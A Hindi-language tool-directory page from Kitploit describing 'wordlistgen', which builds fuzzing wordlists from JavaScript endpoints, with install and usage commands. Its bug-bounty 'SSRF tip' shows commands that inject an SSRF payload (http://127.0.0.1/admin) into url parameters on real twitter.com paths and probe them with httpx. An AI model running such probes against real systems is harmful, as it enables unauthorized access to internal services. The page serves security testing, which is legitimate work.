Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
wordlistgen — fuff के साथ फ़ज़िंग के लिए लक्ष्य-विशिष्ट शब्द सूचियाँ उत्पन्न करता है | Kitploit
उपकरण/GitHubGitHub/ethicalhackingplayground/wordlistgen
पेलोड जनरेशनजानकारी एकत्र करनावेब सुरक्षाफज़िंग
GitHubethicalhackingplayground/wordlistgen

wordlistgen

fuff के साथ फ़ज़िंग के लिए लक्ष्य-विशिष्ट शब्द सूचियाँ उत्पन्न करता है

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
113135 साल पहलेKitploit द्वारा समीक्षित

wordlistgen

जावास्क्रिप्ट में एंडपॉइंट खोजकर लक्ष्य-विशिष्ट वर्डलिस्ट उत्पन्न करता है और अन्य टूल्स के साथ फ़ज़िंग के लिए पैरामीटर जोड़ता है

संस्करण 1.0

स्थापित करें

$ go get -u github.com/ethicalhackingplayground/wordlistgen

$ go get github.com/003random/getJS

GitHub Logo

वर्डलिस्ट उत्पन्न करें

$ echo "https://www.twitter.com" | getJS -complete | ./wordlistgen -p params.txt -d "https://www.twitter.com"

GitHub Logo

फ़फ़ (ffuf) का उपयोग करें

फिर FFuF या https://github.com/tomnomnom/qsreplace के साथ रचनात्मक बनें


SSRF टिप 2:

वर्डलिस्ट उत्पन्न करें

$ cat <Resolved-Domains> | getJS -complete | ./wordlistgen -p params.txt -d <Un-Resolved> | tee wordlist

$ cat "https://www.twitter.com" | getJS -complete | ./wordlistgen -p params.txt -d "www.twitter.com" | tee wordlist

root@kitploit:~
OUTPUT:

www.twitter.com/responsive-web-internal/sourcemaps/client-web-legacy/polyfills.525f28f5.js.map/?url=FUZZ
www.twitter.com/v/latest/72x72//?url=FUZZ
www.twitter.com/responsive-web-internal/sourcemaps/client-web-legacy/en.363b7e25.js.map/?url=FUZZ
www.twitter.com/articles/18311/?url=FUZZ
आप -dL का उपयोग करके सबडोमेन की सूची लोड कर सकते हैं, जैसे:

$ cat <Resolved-Domains> | getJS -complete | ./wordlistgen -p params.txt -dL <Un-Resolved> | tee wordlist

वेरिएबल्स को पेलोड से बदलें

$ cat wordlist | qsreplace http://127.0.0.1/admin | tee -a hosts

root@kitploit:~
OUTPUT:

www.twitter.com/responsive-web-internal/sourcemaps/client-web-legacy/polyfills.525f28f5.js.map/?url=http%3A%2F%2F127.0.0.1%2Fadmin
www.twitter.com/v/latest/72x72//?url=http%3A%2F%2F127.0.0.1%2Fadmin
www.twitter.com/responsive-web-internal/sourcemaps/client-web-legacy/en.363b7e25.js.map/?url=http%3A%2F%2F127.0.0.1%2Fadmin
www.twitter.com/articles/18311/?url=http%3A%2F%2F127.0.0.1%2Fadmin

कोड और शीर्षकों पर नज़र रखने के लिए HTTPX का उपयोग करें

$ cat hosts | httpx -title -status-code

मुझे उम्मीद है कि आप इस तकनीक से बाउंटी प्राप्त करेंगे।


यदि आपको बाउंटी मिले तो कृपया मुझे कॉफ़ी खरीदकर समर्थन करें


मुझे कॉफ़ी खरीदें
टूल डाउनलोड करें